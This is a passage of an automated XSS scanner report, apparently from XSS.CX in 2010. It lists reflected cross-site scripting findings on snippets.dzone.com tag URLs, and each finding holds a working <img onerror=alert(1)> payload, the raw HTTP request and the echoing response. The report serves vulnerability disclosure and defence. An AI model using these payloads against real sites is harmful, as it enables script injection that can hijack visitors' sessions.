/tag/sinatra |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29b0d<img%20src%3da%20onerror%3dalert(1)>20ee5d8e21d was submitted in the REST URL parameter 2. This input was echoed as 29b0d<img src=a onerror=alert(1)>20ee5d8e21d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/sinatra29b0d<img%20src%3da%20onerror%3dalert(1)>20ee5d8e21d HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:22 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9442
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/sinatra29b0d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E20ee5d8e21d">sinatra29b0d<img src=a onerror=alert(1)>20ee5d8e21d</a>
...[SNIP]...
|
1.49. http://snippets.dzone.com/tag/sql [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/sql |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 374f6<img%20src%3da%20onerror%3dalert(1)>49469d05e9d was submitted in the REST URL parameter 2. This input was echoed as 374f6<img src=a onerror=alert(1)>49469d05e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/sql374f6<img%20src%3da%20onerror%3dalert(1)>49469d05e9d HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:07 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/sql374f6%3Cimg+src%3Da+onerror%3Dalert%281%29%3E49469d05e9d">sql374f6<img src=a onerror=alert(1)>49469d05e9d</a>
...[SNIP]...
|
1.50. http://snippets.dzone.com/tag/string [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/string |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51a28<img%20src%3da%20onerror%3dalert(1)>ccf7dbd661 was submitted in the REST URL parameter 2. This input was echoed as 51a28<img src=a onerror=alert(1)>ccf7dbd661 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/string51a28<img%20src%3da%20onerror%3dalert(1)>ccf7dbd661 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:37 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/string51a28%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eccf7dbd661">string51a28<img src=a onerror=alert(1)>ccf7dbd661</a>
...[SNIP]...
|
1.51. http://snippets.dzone.com/tag/text [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/text |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f1ca<img%20src%3da%20onerror%3dalert(1)>bcda4181bf1 was submitted in the REST URL parameter 2. This input was echoed as 4f1ca<img src=a onerror=alert(1)>bcda4181bf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/text4f1ca<img%20src%3da%20onerror%3dalert(1)>bcda4181bf1 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:50 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/text4f1ca%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebcda4181bf1">text4f1ca<img src=a onerror=alert(1)>bcda4181bf1</a>
...[SNIP]...
|
1.52. http://snippets.dzone.com/tag/time [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/time |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca28f<img%20src%3da%20onerror%3dalert(1)>bbf4d2240a2 was submitted in the REST URL parameter 2. This input was echoed as ca28f<img src=a onerror=alert(1)>bbf4d2240a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/timeca28f<img%20src%3da%20onerror%3dalert(1)>bbf4d2240a2 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:39 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/timeca28f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebbf4d2240a2">timeca28f<img src=a onerror=alert(1)>bbf4d2240a2</a>
...[SNIP]...
|
1.53. http://snippets.dzone.com/tag/ubuntu [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/ubuntu |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 939b0<img%20src%3da%20onerror%3dalert(1)>3d526a81967 was submitted in the REST URL parameter 2. This input was echoed as 939b0<img src=a onerror=alert(1)>3d526a81967 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/ubuntu939b0<img%20src%3da%20onerror%3dalert(1)>3d526a81967 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:48 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/ubuntu939b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3d526a81967">ubuntu939b0<img src=a onerror=alert(1)>3d526a81967</a>
...[SNIP]...
|
1.54. http://snippets.dzone.com/tag/unix [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/unix |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8953c<img%20src%3da%20onerror%3dalert(1)>03ca7a655a1 was submitted in the REST URL parameter 2. This input was echoed as 8953c<img src=a onerror=alert(1)>03ca7a655a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/unix8953c<img%20src%3da%20onerror%3dalert(1)>03ca7a655a1 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:48 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/unix8953c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E03ca7a655a1">unix8953c<img src=a onerror=alert(1)>03ca7a655a1</a>
...[SNIP]...
|
1.55. http://snippets.dzone.com/tag/url [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/url |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61801<img%20src%3da%20onerror%3dalert(1)>cea880a2113 was submitted in the REST URL parameter 2. This input was echoed as 61801<img src=a onerror=alert(1)>cea880a2113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/url61801<img%20src%3da%20onerror%3dalert(1)>cea880a2113 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:59 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/url61801%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ecea880a2113">url61801<img src=a onerror=alert(1)>cea880a2113</a>
...[SNIP]...
|
1.56. http://snippets.dzone.com/tag/virtualbox [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/virtualbox |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae19a<img%20src%3da%20onerror%3dalert(1)>3b76a7f29d4 was submitted in the REST URL parameter 2. This input was echoed as ae19a<img src=a onerror=alert(1)>3b76a7f29d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/virtualboxae19a<img%20src%3da%20onerror%3dalert(1)>3b76a7f29d4 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:50 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9451
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/virtualboxae19a%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3b76a7f29d4">virtualboxae19a<img src=a onerror=alert(1)>3b76a7f29d4</a>
...[SNIP]...
|
1.57. http://snippets.dzone.com/tag/virtualization [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/virtualization |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55c01<img%20src%3da%20onerror%3dalert(1)>5bd4726a494 was submitted in the REST URL parameter 2. This input was echoed as 55c01<img src=a onerror=alert(1)>5bd4726a494 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/virtualization55c01<img%20src%3da%20onerror%3dalert(1)>5bd4726a494 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:50 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9463
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/virtualization55c01%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5bd4726a494">virtualization55c01<img src=a onerror=alert(1)>5bd4726a494</a>
...[SNIP]...
|
1.58. http://snippets.dzone.com/tag/web [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/web |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9ccb<img%20src%3da%20onerror%3dalert(1)>a61149ff9d4 was submitted in the REST URL parameter 2. This input was echoed as f9ccb<img src=a onerror=alert(1)>a61149ff9d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/webf9ccb<img%20src%3da%20onerror%3dalert(1)>a61149ff9d4 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:13 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/webf9ccb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea61149ff9d4">webf9ccb<img src=a onerror=alert(1)>a61149ff9d4</a>
...[SNIP]...
|
1.59. http://snippets.dzone.com/tag/win32screenshot [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/win32screenshot |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1643<img%20src%3da%20onerror%3dalert(1)>ce2bc1de4e5 was submitted in the REST URL parameter 2. This input was echoed as b1643<img src=a onerror=alert(1)>ce2bc1de4e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/win32screenshotb1643<img%20src%3da%20onerror%3dalert(1)>ce2bc1de4e5 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:06 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9466
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/win32screenshotb1643%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ece2bc1de4e5">win32screenshotb1643<img src=a onerror=alert(1)>ce2bc1de4e5</a>
...[SNIP]...
|
1.60. http://snippets.dzone.com/tag/windows [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/windows |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6883<img%20src%3da%20onerror%3dalert(1)>eea8d6c61de was submitted in the REST URL parameter 2. This input was echoed as e6883<img src=a onerror=alert(1)>eea8d6c61de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/windowse6883<img%20src%3da%20onerror%3dalert(1)>eea8d6c61de HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:56 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9442
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/windowse6883%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eeea8d6c61de">windowse6883<img src=a onerror=alert(1)>eea8d6c61de</a>
...[SNIP]...
|
1.61. http://snippets.dzone.com/tag/xml [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/xml |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69fc4<img%20src%3da%20onerror%3dalert(1)>f98f210b0c5 was submitted in the REST URL parameter 2. This input was echoed as 69fc4<img src=a onerror=alert(1)>f98f210b0c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/xml69fc4<img%20src%3da%20onerror%3dalert(1)>f98f210b0c5 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:05 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/xml69fc4%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef98f210b0c5">xml69fc4<img src=a onerror=alert(1)>f98f210b0c5</a>
...[SNIP]...
|
1.62. http://snippets.dzone.com/tag/xslt [REST URL parameter 2]
previous
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/xslt |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3cc47<img%20src%3da%20onerror%3dalert(1)>182cb48e1c3 was submitted in the REST URL parameter 2. This input was echoed as 3cc47<img src=a onerror=alert(1)>182cb48e1c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/xslt3cc47<img%20src%3da%20onerror%3dalert(1)>182cb48e1c3 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:34 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/xslt3cc47%3Cimg+src%3Da+onerror%3Dalert%281%29%3E182cb48e1c3">xslt3cc47<img src=a onerror=alert(1)>182cb48e1c3</a>
...[SNIP]...
|
Report generated by XSS.CX at Fri Nov 12 12:35:28 EST 2010.